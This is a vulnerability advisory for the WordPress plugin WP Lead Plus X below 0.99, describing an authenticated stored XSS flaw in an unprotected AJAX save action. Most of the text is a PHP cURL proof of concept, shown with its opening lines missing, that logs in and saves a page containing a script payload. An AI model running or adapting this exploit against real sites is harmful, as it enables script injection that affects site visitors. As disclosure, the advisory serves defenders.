WP Lead Plus X < 0.99 - Authenticated Stored Cross-Site Scripting (XSS)

WP Lead Plus X is a WordPress plugin that allows site owners to create custom landing and “squeeze” pages, complete with its own page builder interface capable of inserting custom JavaScript. Unfortunately, this page builder interface also relied on an unprotected AJAX action core37_lp_save_page which lacked a capability check and a nonce check in order to save and update pages.

PoC

$wp_user, ‘pwd’ => $wp_pass, ‘wp-submit’ => ‘Log+In’, ‘testcookie’ => ‘1’ ))); $output = curl_exec($ch); curl_close($ch); //Insert a page with stored XSS $params=array( ‘pageContent’ => “%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-lp-172110%22%20style%3D%22width%3A%20700px%3B%22%20class%3D%22c37-lp%20c37-step%20ui-sortable%20ui-droppable%22%3E%0A%20%20%20%20%3Csection%20class%3D%22c37-section%20ui-sortable%20ui-droppable%22%20id%3D%22c37-section-643520%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-row%20d-flex%20flex-row%22%20id%3D%22c37-row-326243%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-col-md-12%20c37-col-sm-12%20c37-col-12%22%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-box-865567%22%20class%3D%22c37-box%20flex-column%20d-flex%20flex-column%20ui-sortable%20ui-droppable%22%3E%0A%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%0A%3Cdiv%20data-original%3D%22false%22%20data-c37-type%3D%22code%22%20class%3D%22c37-lp-element%20c37-item-element%20ui-draggable-handle%22%20id%3D%22c37-code-108583%22%3E%0A%20%20%20%20%3Cdiv%20data-content%3D%22%22%20class%3D%22c37-code-container%22%3E%3Cscript%3Ealert(‘xss!’)%3B%3C%2Fscript%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%0A%3C%2Fdiv%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%20%20%20%20%3C%2Fsection%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20”, ‘pageID’ => isset($argv[4]) ? $argv[4] : ‘0’, ‘pageSlug’=>‘poctest’, ‘pageTitle’ => ‘PoCTest’, ‘pageSettings’ => ‘{“isVariant”:false,“isPage”:true,“variantPageID”:0,“webFonts”:[],“modelsJSON”:{“c37-section-643520”:{“action”:{},“hidden”:{“desktop”:false,“tablet”:false,“phone”:false},“cssStyle”:{“desktop”:{“box-shadow”:{},“background-color”:{},“background-overlay”:{}},“phone”:{},“tablet”:{},“customCSS”:“”,“extraClasses”:“”,“innerSelector”:“”,“videoBg”:{“type”:“youtube”,“src”:{“mp4”:“”,“webm”:“”,“ogv”:“”,“yt”:“”}}},“trackingName”:“”,“layout”:12,“containerClass”:“”,“etype”:“section”,“editingElementID”:“c37-section-643520”},“c37-row-326243”:{“action”:{},“hidden”:{“desktop”:false,“tablet”:false,“phone”:false},“cssStyle”:{“desktop”:{“box-shadow”:{},“background-color”:{},“background-overlay”:{}},“phone”:{},“tablet”:{},“customCSS”:“”,“extraClasses”:“”,“innerSelector”:“”,“videoBg”:{“type”:“youtube”,“src”:{“mp4”:“”,“webm”:“”,“ogv”:“”,“yt”:“”}}},“trackingName”:“”,“horizontal”:“”,“vertical”:“”,“layout”:“12”,“etype”:“row”,“editingElementID”:“c37-row-326243”},“c37-box-865567”:{“action”:{},“hidden”:{“desktop”:false,“tablet”:false,“phone”:false},“cssStyle”:{“desktop”:{“box-shadow”:{},“background-color”:{},“background-overlay”:{}},“phone”:{},“tablet”:{},“customCSS”:“”,“extraClasses”:“”,“innerSelector”:“”,“videoBg”:{“type”:“youtube”,“src”:{“mp4”:“”,“webm”:“”,“ogv”:“”,“yt”:“”}}},“trackingName”:“”,“horizontal”:“”,“vertical”:“”,“size”:{“desktop”:12,“tablet”:12,“phone”:12},“direction”:“flex-column”,“etype”:“box”,“editingElementID”:“c37-box-865567”},“c37-code-108583”:{“action”:{},“hidden”:{“desktop”:false,“tablet”:false,“phone”:false},“cssStyle”:{“desktop”:{“box-shadow”:{},“background-color”:{},“background-overlay”:{}},“phone”:{},“tablet”:{},“customCSS”:“”,“extraClasses”:“”,“innerSelector”:“”,“videoBg”:{“type”:“youtube”,“src”:{“mp4”:“”,“webm”:“”,“ogv”:“”,“yt”:“”}}},“trackingName”:“”,“code”:“%3Cscript%3Ealert('xss!')%3B%3C%2Fscript%3E”,“etype”:“code”,“editingElementID”:“c37-code-108583”},“page”:{“action”:{},“hidden”:{“desktop”:false,“tablet”:false,“phone”:false},“cssStyle”:{“desktop”:{“box-shadow”:{},“background-color”:{},“background-overlay”:{}},“phone”:{},“tablet”:{},“customCSS”:“”,“extraClasses”:“”,“innerSelector”:“”,“videoBg”:{“type”:“youtube”,“src”:{“mp4”:“”,“webm”:“”,“ogv”:“”,“yt”:“”}}},“trackingName”:“”,“width”:“700”,“codes”:{“trackingCode”:“”,“experimentCode”:“”,“beforeBodyClosing”:“”,“afterBodyOpening”:“”,“metaCode”:“”,“customCSSCode”:“”},“pageTitle”:“PoC”,“pageSlug”:“poc”,“weight”:“1”,“cssID”:“c37-lp-172110”,“editingElementID”:“page”,“etype”:“page”}},“flipCountdown”:{},“simpleCountdown”:{},“previewURL”:“”,“imageSliders”:{},“weight”:1,“elementsActions”:{},“jsCodes”:{},“compiledCSS”:“”}’, ‘action’ => ‘core37_lp_save_page’ ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘wp-admin/admin-ajax.php’); curl_setopt($ch,CURLOPT_USERAGENT,‘Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_HTTPHEADER, array(‘Content-Type: application/x-www-form-urlencoded; charset=UTF-8’, ‘Connection: close’)); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); $output = curl_exec($ch); echo $output; curl_close($ch);